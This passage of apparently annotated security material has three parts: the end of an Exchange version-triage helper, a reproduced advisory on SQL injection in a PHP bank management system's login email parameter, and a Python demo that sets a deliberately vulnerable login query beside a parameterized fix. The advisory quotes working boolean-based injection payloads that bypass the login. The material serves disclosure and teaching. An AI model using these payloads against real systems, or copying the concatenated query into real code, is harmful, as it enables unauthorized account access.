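    return "none", None, "unknown"


# Constructed sample inputs (not captured from a real server).
SAMPLE_HEADERS = {"Content-Type": "text/xml"}  # no X-OWA-Version leak
SAMPLE_LOGON = '<link rel="shortcut icon" href="/owa/auth/15.2/themes/resources/favicon.ico">'
SAMPLE_MANIFEST = (
    '<assemblyIdentity name="microsoft.exchange.ediscovery.exporttool.application"\n'
    '  version="15.2.986.5" publicKeyToken="b1d1a6c45aa418ce" language="neutral"\n'
    '  processorArchitecture="msil" xmlns="urn:schemas-microsoft-com:asm.v1" />'
)

if __name__ == "__main__":
    # The partial '15.2' on the logon page is skipped; the manifest decides.
    print(triage(SAMPLE_HEADERS, SAMPLE_LOGON, SAMPLE_MANIFEST))
```

Tuple comparison gives the same inclusive semantics as the module's `Rex::Version#between?`, and the partial-version case is the one the module's comments call out: without a fourth segment the build cannot be placed inside or outside a range, so the helper refuses to answer rather than treating "15.2" as "15.2.0.0".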
<pre><code># Title: Bank Management System - MCB Bank v1.0 - SQLi<br /># Author: nu11secur1ty<br /># Date: 02.25.2022<br /># Vendor: https://www.campcodes.com/projects/php/ by: Tariq Fareeds<br /># Software: https://www.campcodes.com/projects/php/bank-management-system-in-php-mysql-free-download/<br /># Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/edit/main/vendors/campcodes.com/Bank-Management-System<br /><br /><br />## Description:<br />The email parameter from Bank Management System - MCB Bank v1.0<br />appears to be vulnerable to SQL injection attacks.<br />The payloads 30735302' or 9098=9098-- and 41995976' or 3071=3078--<br />were each submitted in the email parameter.<br />These two requests resulted in different responses, indicating that<br />the input is being incorporated into a SQL query in an unsafe way.<br />WARNING: If this is in some external domain, or some subdomain<br />redirection, or internal whatever, this will be extremely dangerous!<br />Status: CRITICAL<br /><br /><br />[+] Payloads:<br /><br />```mysql<br />---<br />Parameter: email (POST)<br /> Type: boolean-based blind<br /> Title: OR boolean-based blind - WHERE or HAVING clause<br /> Payload: email=-9337' OR 4870=4870-- Cgzq&password=q7A!t8j!H2&cashierLogin=<br />---<br /><br />```<br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/edit/main/vendors/campcodes.com/Bank-Management-System)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/hvaaiu)<br /><br /></code></pre>
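The advisory's evidence is the boolean-based blind signal: a payload carrying a true condition and one carrying a false condition produce different responses from the same login form. The following is an added example, not the advisory author's code and not the Bank Management System's PHP: it reproduces that signal in Python against an in-memory SQLite table and places the vulnerable concatenated query beside the parameterized fix. The table name, columns, rows and the sha256 password hashing are constructed stand-ins for the application's MySQL schema; the two payloads are the ones the advisory quotes.

```python
"""Boolean-based blind SQL injection in a login query: the vulnerable
concatenation beside its parameterized fix.

Added example; the schema and rows are constructed, the payloads are the
advisory's. SQLite stands in for MySQL. Both treat '-- ' as a comment, and the
payloads already carry the trailing space MySQL requires.
"""
import hashlib
import sqlite3
from typing import Callable, List, Tuple

# Payloads quoted in the advisory for the email parameter: the first carries a
# true condition, the second a false one; the '-- ' discards the password check.
PAYLOAD_TRUE = "30735302' or 9098=9098-- "
PAYLOAD_FALSE = "41995976' or 3071=3078-- "

Row = Tuple[int, str]
LoginFn = Callable[[sqlite3.Connection, str, str], List[Row]]


def _pw_hash(password: str) -> str:
    # Plain sha256 keeps the example self-contained; a real system would use a
    # salted, slow password hash (argon2, bcrypt or scrypt).
    return hashlib.sha256(password.encode()).hexdigest()


def make_db() -> sqlite3.Connection:
    """Constructed in-memory cashier table standing in for the real schema."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE cashiers (id INTEGER PRIMARY KEY, email TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO cashiers (email, password) VALUES (?, ?)",
        [("alice@example.com", _pw_hash("correct horse")),
         ("bob@example.com", _pw_hash("battery staple"))],
    )
    conn.commit()
    return conn


def vulnerable_login(conn: sqlite3.Connection, email: str, password: str) -> List[Row]:
    """The flaw the advisory describes: user input pasted into the SQL text.
    With PAYLOAD_TRUE the WHERE clause becomes
    email = '30735302' or 9098=9098 -- ... and every row matches."""
    sql = ("SELECT id, email FROM cashiers WHERE email = '" + email
           + "' AND password = '" + _pw_hash(password) + "'")
    return conn.execute(sql).fetchall()


def safe_login(conn: sqlite3.Connection, email: str, password: str) -> List[Row]:
    """Hardened form: placeholders, so the payload is compared as a literal
    string against the email column and can never alter the query structure."""
    sql = "SELECT id, email FROM cashiers WHERE email = ? AND password = ?"
    return conn.execute(sql, (email, _pw_hash(password))).fetchall()


def responds_differently(login: LoginFn, conn: sqlite3.Connection) -> bool:
    """The advisory's detection signal: a true-condition and a false-condition
    payload yield different results. True for the vulnerable query, False
    for the parameterized one (both payloads simply match no email)."""
    return login(conn, PAYLOAD_TRUE, "x") != login(conn, PAYLOAD_FALSE, "x")


if __name__ == "__main__":
    db = make_db()
    print("vulnerable query distinguishes payloads:", responds_differently(vulnerable_login, db))
    print("parameterized query distinguishes payloads:", responds_differently(safe_login, db))
```

The same true/false pair is what a scanner such as the sqlmap run quoted above sends; once the query is parameterized the two payloads are indistinguishable from any other non-existent email, which is the condition a fix should be re-tested against.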